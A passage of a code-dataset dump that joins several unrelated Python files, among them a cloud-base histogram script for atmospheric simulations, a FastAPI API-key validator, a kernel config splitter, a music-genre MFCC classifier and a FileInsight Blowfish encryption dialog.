reg_var+'_up':(('regularized height', 'regularized time','length'), var_curtain_bin_up_sum.transpose()/n_curtain_bin_up),
reg_var+'_dw':(('regularized height', 'regularized time','length'), var_curtain_bin_dw_sum.transpose()/n_curtain_bin_dw)},
coords={'regularized time':t_reg_mid, 'regularized height':z_reg_mid, 'length':mid_bin_size})
xr_dataset[reg_var].attrs['n'] =n_curtain_bin
xr_dataset[reg_var+'_up'].attrs['n'] =n_curtain_bin_up
xr_dataset[reg_var+'_dw'].attrs['n'] =n_curtain_bin_dw
xr_dataset.attrs = settings_dict
save_string = directory_output+ reg_var+save_string_base+'_sizebin.nc'
xr_dataset.to_netcdf(save_string)
print('saved size binned beards to '+save_string)
print(':')
print(':')
print(':')
print(':')
print(':')
return
#A simple script which calculates a histogram below the cloud base and saves it
#I will try to keep it at least somewhat general with a flexible variable
def proc_pdf(reg_var = 'w',
date_str='20160611',
directory_input ='/data/testbed/lasso/sims/',
directory_output ='data_pdfs/',
data_dim_flag=3,
special_name='',
N_it_max=1e9,
N_it_min=0,
anomaly_flag =0,
N_bins=400,
base_percentile = 25,
boundary_scaling_flag = 1,
range_var = [-10,10] ):
#We are starting out with histograms of w from -10 to 10 and a 0.1 spacing
var_hist_sum=np.zeros(N_bins)
date = date_str
#value used to determine existence of cloud
ql_min = 1e-5
z_min = 10 #Index of minimum z_vlvl of the cbl
print('looking into date: ',date)
if data_dim_flag==1:
filename_column = []
#uses glob to get all files which contain column.
column_files = glob.glob(directory_input+date+'/*.column.*.*.*.nc')
for c_file in column_files:
filename_column.append(c_file)
print('filename column included:',c_file)
if data_dim_flag==3:
filename_w = directory_input+date+'/w.nc'
filename_l = directory_input+date+'/ql.nc'
file_w = Dataset(filename_w,read='r')
file_ql = Dataset(filename_l,read='r')
[nz, nx, ny] = get_zxy_dimension(filename_l,'ql')
#getting variable to be regularized
filename_var = directory_input+date+'/'+reg_var+'.nc'
file_var = Dataset(filename_var,read='r')
filename_prof=glob.glob(directory_input+date+'/testbed?default?0*.nc')[0]
#filename_prof=directory_input+date+'/testbed.default.0000000.nc'
if date=='bomex':
filename_prof=directory_input+date+'/bomex.default.0000000.nc'
file_prof = Dataset(filename_prof,read='r')
extra_string = ''
#This now a bit trickier then for the 3D version. Will have to calculate a vector for the lower time resolution of the profile,
#Then latter apply the nearest value to the full 1d time vec
#First loading surface variables from default profile
print('calculating cbl height from profile file')
T = file_prof['thl'][:,0]
p = file_prof['p'][:,0]*0.0+99709
qt = file_prof['qt'][:,0]
w2 = file_prof['w2'][:,:]
nz_prof = w2.shape[1]
var_prof = file_prof[reg_var][:,:] #needed for anomaly processing
#Just grabbing this to calculate dz
z_prof = file_prof['z'][:]
dz = z_prof[1]-z_prof[0]
print('dz: ',dz)
#for boundary scaling
total_surf_buoy_flux = file_prof['bflux'][:,1]
total_surf_thl_flux = file_prof['thlflux'][:,1]
total_surf_qt_flux = file_prof['qtflux'][:,1]
time_prof = file_prof['time'][:]
cbl_1d_prof = time_prof*0.0
#Hack together the Lifting condensation level LCL
qt_pressure = p*qt
sat_qv = 6.112*100 * np.exp(17.67 * (T - 273.15) / (T - 29.65 ))
#rel_hum = np.asmatrix(qt_pressure/sat_qv)[0]
rel_hum = qt_pressure/sat_qv
#Dewpoint
A = 17.27
B = 237.7
alpha = ((A * (T- 273.15)) / (B + (T-273.15)))
alpha = alpha + np.log(rel_hum)
dewpoint = (B * alpha) / (A - alpha)
dewpoint = dewpoint + 273.15
LCL = 125.*(T-dewpoint)
LCL_index = np.floor(LCL/dz)
#now calculate the cbl top for each profile time
for tt in range(len(time_prof)):
w_var = 1.0
z=z_min
while w_var > 0.08:
z += 1
w_var = w2[tt,z]
#w_var = np.var(w_1d[z,:])
#Mimimum of LCL +100 or variance plus 300 m
cbl_1d_prof[tt] = min(z+300/dz,LCL_index[tt])
#To avoid issues later on I set the maximum cbl height to 60 % of the domain height, but spit out a warning if it happens
if cbl_1d_prof[tt]>0.6*nz_prof:
print('warning, cbl height heigher than 0.6 domain height, could crash regularization later on, timestep: ',tt)
cbl_1d_prof[tt] = math.floor(nz*0.6)
print('resulting indexes of cbl over time: ',cbl_1d_prof)
print('calculated LCL: ',LCL_index)
#Now we either iterate over columns or timesteps
if data_dim_flag==1:
n_iter =len(filename_column)
if data_dim_flag==3:
n_iter =len(time_prof)
#for col in filename_column:
n_iter = min(n_iter,N_it_max)
for it in range(N_it_min,n_iter):
time1 = ttiimmee.time()
if data_dim_flag ==1:
print('loading column: ',filename_column[it])
file_col = Dataset(filename_column[it],read='r')
w_2d = file_col.variables['w'][:]
w_2d = w_2d.transpose()
ql_2d = file_col.variables['ql'][:]
ql_2d = ql_2d.transpose()
t_1d = file_col.variables['time'][:]
print('t_1d',t_1d)
#Load the var file, even if means that we doable load w_2d or ql_2d
var_2d = file_col.variables[reg_var][:]
var_2d = var_2d.transpose()
#The needed cbl height
cbl_1d = t_1d*0
bflux_s_1d = t_1d*0
qtflux_s_1d = t_1d*0
thlflux_s_1d= t_1d*0
#Now we go through profile time snapshots and allocate the closest full time values to the profile values
dt_2 = (time_prof[1]-time_prof[0])/2
for tt in range(len(time_prof)):
cbl_1d[abs(t_1d-time_prof[tt])<dt_2] = cbl_1d_prof[tt]
bflux_s_1d[abs(t_1d-time_prof[tt])<dt_2] = total_surf_buoy_flux[tt]
qtflux_s_1d[abs(t_1d-time_prof[tt])<dt_2] = total_surf_qt_flux[tt]
thlflux_s_1d[abs(t_1d-time_prof[tt])<dt_2] = total_surf_thl_flux[tt]
#to get anomalies we subtract the closet mean profile
if anomaly_flag==1:
for tt in range(len(time_prof)):
tmp_matrix = var_2d[:,abs(t_1d-time_prof[tt])<dt_2]
tmp_vector = var_prof[tt,:]
#because the vectors don't perfectly align
var_2d[:,abs(t_1d-time_prof[tt])<dt_2] = (tmp_matrix.transpose() - tmp_vector).transpose()
# = var_2d[:,abs(t_1d-time_prof[tt])<dt_2]-var_prof[tt,:]
if data_dim_flag ==3:
if sum(file_prof['ql'][it,:])>0.0:
print('loading timestep: ',it)
ql_3d = grab_3d_field(file_ql ,it,'ql')
w_3d = grab_3d_field(file_w ,it,'w')
var_3d = grab_3d_field(file_var ,it,reg_var)
#Here we have to do all the fuckery to turn the 3D fields into 2d slices with an imaginary time vector
w_2d = np.array(w_3d.reshape((nz,nx*ny)))
ql_2d = np.array(ql_3d.reshape((nz,nx*ny)))
var_2d = np.array(var_3d.reshape((nz,nx*ny)))
#Now we do the same thing with the transposed field, use to be an either or, now just add it on
w_3d = np.transpose( w_3d, (0, 2, 1))
ql_3d = np.transpose(ql_3d, (0, 2, 1))
var_3d = np.transpose(var_3d, (0, 2, 1))
#globals().update(locals())
w_2d = np.hstack([w_2d ,np.array(w_3d.reshape((nz,nx*ny)))])
ql_2d = np.hstack([ql_2d ,np.array(ql_3d.reshape((nz,nx*ny)))])
var_2d = np.hstack([var_2d ,np.array(var_3d.reshape((nz,nx*ny)))])
#This might save a bit of memory
if reg_var == 'w':
var_2d = w_2d
if reg_var == 'ql':
var_2d = ql_2d
#Should now be able to delete 3d fields as they aren't needed anymore, not sure if that helps save any memory though
del w_3d
del ql_3d
del var_3d
gc.collect()
#fake t vector,
t_1d = np.linspace(0,2*nx*ny,2*nx*ny)
#Switching to anomalies if anomaly flag is used
if anomaly_flag==1:
#because the vectors don't perfectly align
var_2d[:,:] = (var_2d.transpose() - var_prof[it,:]).transpose()
#to get the fake time vector we load the wind from the profile data, which devided by the grid spacing gives us a fake time resolution
#we use the calculated cbl+300 meter or lcl as reference height
ref_lvl = cbl_1d_prof[it]
else:
#If no clouds are present we pass a very short empty fields over to the chord searcher
print('skipping timestep: ',it,' cause no clouds')
ql_2d = np.zeros((nz,1))
w_2d = np.zeros((nz,1))
var_2d = np.zeros((nz,1))
t_1d = np.zeros(1)
#The needed cbl height, which constant everywhere
cbl_1d = t_1d*0
cbl_1d[:] = cbl_1d_prof[it]
#The needed surface buoyancy flux, which is constant everywhere
bflux_s_1d = t_1d*0 + total_surf_buoy_flux[it]
qtflux_s_1d = t_1d*0 + total_surf_qt_flux[it]
thlflux_s_1d = t_1d*0 + total_surf_thl_flux[it]
time2 = ttiimmee.time()
print('loading time:',(time2-time1)*1.0,)
### Detecting lowest cloud cell is within 300 m of CBL
nt = len(cbl_1d)
cl_base = np.zeros(nt)
#Detecting all cloudy cells
#Use to have a different method using nans that doesn:t work anymore somehow. Now I just set it really high where there is no cloud.
for t in range(nt):
if np.max(ql_2d[:,t])>ql_min :
cl_base[t]=np.argmax(ql_2d[:,t]>ql_min)
else:
cl_base[t]=10000000
cl_base=cl_base.astype(int)
#Now find c base lower than the max height
cbl_cl_idx = np.where((cl_base-cbl_1d[:nt])*dz<0)[0]
cbl_cl_binary = cl_base*0
cbl_cl_binary[cbl_cl_idx]=1
print('iterating through step ',it,'which contains ',len(cbl_cl_idx),'cloudy columns')
if len(cbl_cl_idx)>0:
#Now calculating the var at cloud base
var_cl_base=var_2d[cl_base[cbl_cl_idx]-1,cbl_cl_idx]
#If boundary scaling is used, the variable is scaled accordingly
#Only called if there are any clouds
if boundary_scaling_flag == 1 and len(cbl_cl_idx)>1:
#First thing to do is calculate the chord base using the 25 percentile in agreement with Neil
if data_dim_flag==3:
z_idx_base_default = math.floor(np.percentile(cl_base[cbl_cl_idx],base_percentile))
# Can't think of a good way to do this, will throw up an error for the mean time.
if data_dim_flag==1:
print('sorry, but I havent implemented star scaling for 1d data')
sys.exit()
#Now adding the boundary scaling using w*
#Is a bit overcooked currently as it only works with 3D data and thus all surface fluxes are the same everywhere.
surf_flux = np.mean(bflux_s_1d)
base_height = z_idx_base_default*dz
w_star=(base_height*surf_flux)**(1/3)
if reg_var=='w':
boundary_scaling = w_star
if reg_var=='qt':
surf_flux = np.mean(qtflux_s_1d)
boundary_scaling = surf_flux/w_star
if reg_var=='thl':
thl_flux = np.mean(thlflux_s_1d)
boundary_scaling = surf_flux/w_star
var_cl_base = var_cl_base/boundary_scaling
#Calculating the histogram, and adding it to the total histogram
var_hist,bin_edges = np.histogram(var_cl_base,range=range_var,bins=N_bins)
var_hist_sum = var_hist_sum+var_hist
else:
print('no cloudy columns apparently')
var_pdf = var_hist_sum
save_string_base = '_pdf_'+date+'_d'+str(data_dim_flag)+'_an'+str(anomaly_flag)
if N_it_min>0:
save_string_base = save_string_base+'_Nmin'+str(N_it_min)
if N_it_max<1e9:
save_string_base = save_string_base+'_Nmax'+str(n_iter)
if boundary_scaling_flag==1:
save_string_base = 'star'+save_string_base
save_string = directory_output+ reg_var+save_string_base
save_string = save_string+'.npz'
np.savez(save_string,var_pdf=var_pdf,range_var=range_var)
print('saved pdf with ', sum(var_pdf), 'points to '+save_string)
print(':')
print(':')
print(':')
print(':')
print(':')
print(':')
print(':')
print(':')
print(':')
print(':')
print(':')
return
| 2.265625 | 2 |
expression-atlas-wf/scripts/dmel_tau_housekeeping.py | jfear/larval_gonad | 1 | 5087 | """D. mel housekeeping genes based on tau.
Uses the intersection of w1118 and orgR to create a list of
D. mel housekeeping genes.
"""
import os
from functools import partial
import pandas as pd
from larval_gonad.io import pickle_load, pickle_dump
def main():
# Load mapping of YOgn to FBgn
annot = pickle_load(snakemake.input.annot[0])
pickle_dump(intersect_fbgns(snakemake.input.male, annot), snakemake.output.male)
pickle_dump(intersect_fbgns(snakemake.input.female, annot), snakemake.output.female)
def intersect_fbgns(file_names, annot):
return list(set.intersection(*list(map(partial(convert_to_fbgn, annot=annot), file_names))))
def convert_to_fbgn(file_name, annot):
return set(
[
fbgn
for fbgn in map(lambda x: annot.get(x, None), pickle_load(file_name))
if fbgn is not None
]
)
if __name__ == "__main__":
if os.getenv("SNAKE_DEBUG", False):
from larval_gonad.debug import snakemake_debug
snakemake = snakemake_debug(
workdir="expression-atlas-wf",
input=dict(
male=[
"../output/expression-atlas-wf/tau_housekeeping/w1118_male.pkl",
"../output/expression-atlas-wf/tau_housekeeping/orgR_male.pkl",
],
female=[
"../output/expression-atlas-wf/tau_housekeeping/w1118_female.pkl",
"../output/expression-atlas-wf/tau_housekeeping/orgR_female.pkl",
],
annot="../output/expression-atlas-wf/YOgn_to_dmel_ortholog/dmel.pkl",
),
)
main()
| 2.4375 | 2 |
api-server/server/core/key.py | TK-IBM-Call-for-Code-Challange-2021/call-for-code-challenge-2021 | 75 | 5088 | <filename>api-server/server/core/key.py
"""
Api Key validation
"""
from typing import Optional
from fastapi.security.api_key import APIKeyHeader
from fastapi import HTTPException, Security, Depends
from starlette.status import HTTP_401_UNAUTHORIZED, HTTP_400_BAD_REQUEST, HTTP_403_FORBIDDEN
from server.core.security import verify_key
from server.db.mongodb import AsyncIOMotorClient, get_database
from server.models.user import User
from server.db.crud.user import get_user_by_email
from pydantic import EmailStr
api_key_scheme = APIKeyHeader(name="X-API-KEY", auto_error=False)
email_scheme = APIKeyHeader(name="X-EMAIL-ID", auto_error=False)
async def validate_request(
api_key: Optional[str] = Security(api_key_scheme),
email_id: Optional[EmailStr] = Security(email_scheme),
db: AsyncIOMotorClient = Depends(get_database)
) -> Optional[User]:
"""Validate a request with given email and api key
to any endpoint resource
"""
if api_key is None:
raise HTTPException(
status_code=HTTP_400_BAD_REQUEST, detail="X-API-KEY is missing", headers={}
)
if email_id is None:
raise HTTPException(
status_code=HTTP_400_BAD_REQUEST, detail="X-EMAIL-ID is missing", headers={}
)
user = await get_user_by_email(db, email_id)
# verify email & API key
if user:
api_key = str(user.salt) + str(api_key)
if not verify_key(api_key, user.hashed_api_key):
# api key mismatch
raise HTTPException(
status_code=HTTP_401_UNAUTHORIZED, detail="Access not allowed", headers={}
)
if user.disabled:
# disabled user
raise HTTPException(
status_code=HTTP_403_FORBIDDEN, detail="User is disabled", headers={}
)
if not user.is_active:
# user's email is not verified
raise HTTPException(
status_code=HTTP_401_UNAUTHORIZED, detail="Email not verified", headers={}
)
# All verified
return User(**user.dict())
else:
# not a valid email provided
raise HTTPException(
status_code=HTTP_400_BAD_REQUEST, detail="Unknown Email", headers={}
)
| 2.453125 | 2 |
scripts/kconfig-split.py | Osirium/linuxkit | 7,798 | 5089 | <reponame>Osirium/linuxkit<gh_stars>1000+
#!/usr/bin/env python
# This is a slightly modified version of ChromiumOS' splitconfig
# https://chromium.googlesource.com/chromiumos/third_party/kernel/+/stabilize-5899.B-chromeos-3.14/chromeos/scripts/splitconfig
"""See this page for more details:
http://dev.chromium.org/chromium-os/how-tos-and-troubleshooting/kernel-configuration
"""
import os
import re
import sys
allconfigs = {}
# Parse config files
for config in sys.argv[1:]:
allconfigs[config] = set()
for line in open(config):
m = re.match("#*\s*CONFIG_(\w+)[\s=](.*)$", line)
if not m:
continue
option, value = m.groups()
allconfigs[config].add((option, value))
# Split out common config options
common = allconfigs.values()[0].copy()
for config in allconfigs.keys():
common &= allconfigs[config]
for config in allconfigs.keys():
allconfigs[config] -= common
allconfigs["common"] = common
# Generate new splitconfigs
for config in allconfigs.keys():
f = open("split-" + config, "w")
for option, value in sorted(list(allconfigs[config])):
if value == "is not set":
print >>f, "# CONFIG_%s %s" % (option, value)
else:
print >>f, "CONFIG_%s=%s" % (option, value)
f.close()
| 2.40625 | 2 |
src/synapse/azext_synapse/vendored_sdks/azure_synapse/models/livy_statement_output.py | Mannan2812/azure-cli-extensions | 2 | 5090 | <gh_stars>1-10
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class LivyStatementOutput(Model):
"""LivyStatementOutput.
:param status:
:type status: str
:param execution_count:
:type execution_count: int
:param data:
:type data: object
:param ename:
:type ename: str
:param evalue:
:type evalue: str
:param traceback:
:type traceback: list[str]
"""
_attribute_map = {
'status': {'key': 'status', 'type': 'str'},
'execution_count': {'key': 'execution_count', 'type': 'int'},
'data': {'key': 'data', 'type': 'object'},
'ename': {'key': 'ename', 'type': 'str'},
'evalue': {'key': 'evalue', 'type': 'str'},
'traceback': {'key': 'traceback', 'type': '[str]'},
}
def __init__(self, **kwargs):
super(LivyStatementOutput, self).__init__(**kwargs)
self.status = kwargs.get('status', None)
self.execution_count = kwargs.get('execution_count', None)
self.data = kwargs.get('data', None)
self.ename = kwargs.get('ename', None)
self.evalue = kwargs.get('evalue', None)
self.traceback = kwargs.get('traceback', None)
| 2.03125 | 2 |
src/main.py | mafshar/sub-puppo | 1 | 5091 | <reponame>mafshar/sub-puppo<filename>src/main.py
#!/usr/bin/env python
'''
Notes:
- Weak implies weakly supervised learning (4 classes)
- Strong implies strongly (fully) superversied learning (10 classes)
- frame number is set to 22ms (default); that is the "sweet spot" based on dsp literature
- sampling rate is 16kHz (for the MFCC of each track)
- Accuracy increases as the test set gets smaller, which implies that a lot of these machine learning models are heavily data-driven (i.e. feed more data for more performance boosts)
- Currently, optimal benchmark results are achieved with a test set size of 10 percent of the total data
'''
import os
import glob
import sys
import time
import warnings
warnings.filterwarnings("ignore")
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from processing import mfcc_processing, datasets
from deep_models import models
from sklearn.model_selection import train_test_split
from sklearn.svm import SVC
from sklearn.neighbors import KNeighborsClassifier
from sklearn.cluster import KMeans
from sklearn.preprocessing import MinMaxScaler
from sklearn.preprocessing import normalize
input_path = './data/genres/'
mfcc_path = './data/processed/mfcc/'
have_mfccs = True
def normalize_and_split(data, test_size, verbose=False):
scaler = MinMaxScaler()
features = scaler.fit_transform(data['features'])
labels = data['labels']
X_train, X_test, y_train, y_test = train_test_split(features, labels, test_size=test_size, random_state=42)
norm_data = {}
norm_data['X_train'] = X_train
norm_data['X_test'] = X_test
norm_data['y_train'] = y_train
norm_data['y_test'] = y_test
if verbose:
print 'Training sample feature size:', X_train.shape
print 'Training sample label size:', y_train.shape
print 'Test sample feature size:', X_test.shape
print 'Test sample label size:', y_test.shape
return norm_data
def svm_classifier(data, test_size, weak=False, verbose=False):
norm_data = normalize_and_split(data, test_size, verbose)
X_train = norm_data['X_train']
X_test = norm_data['X_test']
y_train = norm_data['y_train']
y_test = norm_data['y_test']
tic = time.time()
svm_clf = SVC(C=10000, kernel='poly', degree=3, tol=0.0001, max_iter=5000, decision_function_shape='ovr') if weak \
else SVC(C=10000, kernel='poly', degree=6, tol=0.01, max_iter=5000, decision_function_shape='ovr')
svm_clf.fit(X_train, y_train)
print 'TEST ACCURACY:', svm_clf.score(X_test, y_test)
toc = time.time()
if verbose:
print '\ttime taken for SVM classifier to run is', toc-tic
return
def knn_classifier(data, test_size, weak=False, verbose=False):
norm_data = normalize_and_split(data, test_size, verbose)
X_train = norm_data['X_train']
X_test = norm_data['X_test']
y_train = norm_data['y_train']
y_test = norm_data['y_test']
tic = time.time()
knn_clf = KNeighborsClassifier(n_neighbors=3, weights='distance', p=1, n_jobs=-1) if weak \
else KNeighborsClassifier(n_neighbors=8, weights='distance', p=1, n_jobs=-1)
knn_clf.fit(X_train, y_train)
print 'TEST ACCURACY:', knn_clf.score(X_test, y_test)
toc = time.time()
if verbose:
print '\ttime taken for KNN classifier to run is', toc-tic
return
def mfcc_nn_model(num_epochs, test_size, weak=False, verbose=False):
tic = time.time()
tensorize = datasets.ToTensor()
dataset = None
net = None
if weak:
dataset = datasets.MfccDatasetWeak(mfcc_path, tensorize)
net = models.MfccNetWeak()
else:
dataset = datasets.MfccDataset(mfcc_path, tensorize)
net = models.MfccNet()
trainloader, testloader = datasets.train_test_dataset_split(dataset)
criterion = nn.CrossEntropyLoss()
optimizer = optim.SGD(net.parameters(), lr=0.1, momentum=0.8)
for epoch in range(num_epochs):
running_loss = 0.0
for i, data in enumerate(trainloader, 0):
inputs, labels = data
# zero the parameter gradients
optimizer.zero_grad()
# forward + backward + optimize
outputs = net(inputs)
loss = criterion(outputs, labels)
loss.backward
optimizer.step()
# print statistics
running_loss += loss.item()
if verbose and i % 5 == 0: # print every 2000 mini-batches
print('[%d, %5d] loss: %.3f' % (epoch + 1, i + 1, running_loss / 2000))
running_loss = 0.0
correct = 0
total = 0
with torch.no_grad():
for data in testloader:
inputs, labels = data
outputs = net(inputs)
_, predicted = torch.max(outputs.data, 1)
total += labels.size(0)
correct += (predicted == labels).sum().item()
print 'TEST ACCURACY:', 1. * correct / total
toc = time.time()
if verbose:
print '\ttime taken for Mfcc NN to run is', toc-tic
return
if __name__ == '__main__':
mfccs = None
data = None
if not have_mfccs:
have_mfccs = True
print 'calculating mfccs...'
mfccs = mfcc_processing.write_mfccs(input_path, mfcc_path, True)
else :
print 'retrieving mfccs...'
mfccs = mfcc_processing.read_mfccs(mfcc_path, True)
data = mfcc_processing.featurize_data(mfccs, weak=True, verbose=True)
print
weak = False
if weak:
data = mfcc_processing.featurize_data(mfccs, weak=True, verbose=True)
print
svm_classifier(data, test_size=0.10, weak=True, verbose=True)
print
knn_classifier(data, test_size=0.10, weak=True, verbose=True)
print
mfcc_nn_model(num_epochs=10, test_size=0.10, weak=True, verbose=True)
else:
data = mfcc_processing.featurize_data(mfccs, weak=False, verbose=True)
print
svm_classifier(data, test_size=0.10, weak=False, verbose=True)
print
knn_classifier(data, test_size=0.10, weak=False, verbose=True)
print
mfcc_nn_model(num_epochs=10, test_size=0.10, weak=False, verbose=True)
| 2.109375 | 2 |
plugins/Operations/Crypto/blowfish_encrypt_dialog.py | nmantani/FileInsight-plugins | 120 | 5092 | <filename>plugins/Operations/Crypto/blowfish_encrypt_dialog.py
#
# Blowfish encrypt - Encrypt selected region with Blowfish
#
# Copyright (c) 2019, <NAME>
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import binascii
import re
import sys
import time
import tkinter
import tkinter.ttk
import tkinter.messagebox
try:
import Cryptodome.Cipher.Blowfish
import Cryptodome.Util.Padding
except ImportError:
exit(-1) # PyCryptodome is not installed
# Print selected items
def encrypt(data, root, cm, ckt, ek, cit, ei):
blowfish_mode = {"ECB":Cryptodome.Cipher.Blowfish.MODE_ECB,
"CBC":Cryptodome.Cipher.Blowfish.MODE_CBC,
"CFB":Cryptodome.Cipher.Blowfish.MODE_CFB,
"OFB":Cryptodome.Cipher.Blowfish.MODE_OFB,
"CTR":Cryptodome.Cipher.Blowfish.MODE_CTR}
mode = cm.get()
key_type = ckt.get()
key = ek.get()
iv_type = cit.get()
iv = ei.get()
if key_type == "Hex":
if re.match("^([0-9A-Fa-f]{2})+$", key):
key = binascii.a2b_hex(key)
else:
tkinter.messagebox.showerror("Error:", message="Key is not in hex format.")
return
else:
key = key.encode()
if mode in ["CBC", "CFB", "OFB", "CTR"] and iv_type == "Hex":
if re.match("^([0-9A-Fa-f]{2})+$", iv):
iv = binascii.a2b_hex(iv)
else:
tkinter.messagebox.showerror("Error:", message="IV is not in hex format.")
return
else:
iv = iv.encode()
if mode in ["CBC", "CFB", "OFB", "CTR"] and len(iv) != Cryptodome.Cipher.Blowfish.block_size:
tkinter.messagebox.showerror("Error:", message="IV size must be %d bytes." % Cryptodome.Cipher.Blowfish.block_size)
return
key_length = len(key)
if key_length < 4 or key_length > 56:
tkinter.messagebox.showerror("Error:", message="Key size must be in the range from 4 bytes and 56 bytes.")
return
try:
if mode == "CFB":
cipher = Cryptodome.Cipher.Blowfish.new(key, blowfish_mode[mode], iv, segment_size=Cryptodome.Cipher.Blowfish.block_size * 8)
elif mode in ["CBC", "OFB"]:
cipher = Cryptodome.Cipher.Blowfish.new(key, blowfish_mode[mode], iv)
elif mode == "CTR": # The first seven bytes of IV are used as nonce and the last byte is used as initial_value (compatible with CyberChef).
cipher = Cryptodome.Cipher.Blowfish.new(key, blowfish_mode[mode], nonce=iv[0:7], initial_value=iv[7])
else:
cipher = Cryptodome.Cipher.Blowfish.new(key, blowfish_mode[mode])
if mode in ["ECB", "CBC"]:
data = Cryptodome.Util.Padding.pad(data, Cryptodome.Cipher.Blowfish.block_size)
d = cipher.encrypt(data)
except Exception as e:
tkinter.messagebox.showerror("Error:", message=e)
root.quit()
exit(1) # Not decrypted
sys.stdout.buffer.write(d)
root.quit()
exit(0) # Decrypted successfully
def combo_mode_selected(root, cm, cit, ei, lc):
mode = cm.get()
if mode == "ECB":
cit.configure(state = "disabled")
ei.configure(state = "disabled")
else:
cit.configure(state = "readonly")
ei.configure(state = "normal")
if mode == "CTR":
lc.grid()
else:
lc.grid_remove()
# Receive data
data = sys.stdin.buffer.read()
# Create input dialog
root = tkinter.Tk()
root.title("Blowfish encrypt")
root.protocol("WM_DELETE_WINDOW", (lambda r=root: r.quit()))
label_mode = tkinter.Label(root, text="Mode:")
label_mode.grid(row=0, column=0, padx=5, pady=5, sticky="w")
combo_mode = tkinter.ttk.Combobox(root, width=5, state="readonly")
combo_mode["values"] = ("ECB", "CBC", "CFB", "OFB", "CTR")
combo_mode.current(0)
combo_mode.grid(row=0, column=1, padx=5, pady=5, sticky="w")
label_key_type = tkinter.Label(root, text="Key type:")
label_key_type.grid(row=1, column=0, padx=5, pady=5, sticky="w")
combo_key_type = tkinter.ttk.Combobox(root, width=5, state="readonly")
combo_key_type["values"] = ("Text", "Hex")
combo_key_type.current(0)
combo_key_type.grid(row=1, column=1, padx=5, pady=5)
label_key = tkinter.Label(root, text="Key:")
label_key.grid(row=1, column=2, padx=5, pady=5, sticky="w")
entry_key = tkinter.Entry(width=32)
entry_key.grid(row=1, column=3, padx=5, pady=5, sticky="w")
entry_key.focus() # Focus to this widget
label_iv_type = tkinter.Label(root, text="IV type:")
label_iv_type.grid(row=2, column=0, padx=5, pady=5, sticky="w")
combo_iv_type = tkinter.ttk.Combobox(root, width=5, state="readonly")
combo_iv_type["values"] = ("Text", "Hex")
combo_iv_type.current(0)
combo_iv_type.grid(row=2, column=1, padx=5, pady=5)
label_iv = tkinter.Label(root, text="IV:")
label_iv.grid(row=2, column=2, padx=5, pady=5, sticky="w")
entry_iv = tkinter.Entry(width=32)
entry_iv.grid(row=2, column=3, padx=5, pady=5, sticky="w")
button = tkinter.Button(root, text="OK", command=(lambda data=data, root=root, cm=combo_mode, ckt=combo_key_type, ek=entry_key, cit=combo_iv_type, ei=entry_iv: encrypt(data, root, cm, ckt, ek, cit, ei)))
button.grid(row=3, column=0, padx=5, pady=5, columnspan=4)
label_ctr = tkinter.Label(root, text="Note:\nThe first seven bytes of IV are used as the nonce and the last one\nbyte is used as the initial value of the counter (compatible with\nCyberChef).", justify="left")
label_ctr.grid(row=4, column=0, padx=5, pady=5, columnspan=4, sticky="w")
label_ctr.grid_remove()
# Set callback functions
combo_mode.bind('<<ComboboxSelected>>', lambda event, root=root, cm=combo_mode, cit=combo_iv_type, ei=entry_iv, lc=label_ctr: combo_mode_selected(root, cm, cit, ei, lc))
combo_mode.bind("<Return>", lambda event, data=data, root=root, cm=combo_mode, ckt=combo_key_type, ek=entry_key, cit=combo_iv_type, ei=entry_iv: encrypt(data, root, cm, ckt, ek, cit, ei))
combo_key_type.bind("<Return>", lambda event, data=data, root=root, cm=combo_mode, ckt=combo_key_type, ek=entry_key, cit=combo_iv_type, ei=entry_iv: encrypt(data, root, cm, ckt, ek, cit, ei))
entry_key.bind("<Return>", lambda event, data=data, root=root, cm=combo_mode, ckt=combo_key_type, ek=entry_key, cit=combo_iv_type, ei=entry_iv: encrypt(data, root, cm, ckt, ek, cit, ei))
combo_iv_type.bind("<Return>", lambda event, data=data, root=root, cm=combo_mode, ckt=combo_key_type, ek=entry_key, cit=combo_iv_type, ei=entry_iv: encrypt(data, root, cm, ckt, ek, cit, ei))
entry_iv.bind("<Return>", lambda event, data=data, root=root, cm=combo_mode, ckt=combo_key_type, ek=entry_key, cit=combo_iv_type, ei=entry_iv: encrypt(data, root, cm, ckt, ek, cit, ei))
button.bind("<Return>", lambda event, data=data, root=root, cm=combo_mode, ckt=combo_key_type, ek=entry_key, cit=combo_iv_type, ei=entry_iv: encrypt(data, root, cm, ckt, ek, cit, ei))
# These are disabled in the initial state (ECB mode)
combo_iv_type.configure(state = "disabled")
entry_iv.configure(state = "disabled")
# Adjust window position
sw = root.winfo_screenwidth()
sh = root.winfo_screenheight()
root.update_idletasks() # Necessary to get width and height of the window
ww = root.winfo_width()
wh = root.winfo_height()
root.geometry('+%d+%d' % ((sw/2) - (ww/2), (sh/2) - (wh/2)))
root.mainloop()
exit(1) # Not decrypted
